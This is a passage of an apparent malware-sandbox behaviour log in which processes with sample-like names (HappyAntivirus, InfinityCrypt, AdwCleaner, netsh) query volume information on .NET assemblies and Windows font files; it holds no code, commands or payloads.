          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Users\user\AppData\Local\6AdwCleaner.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
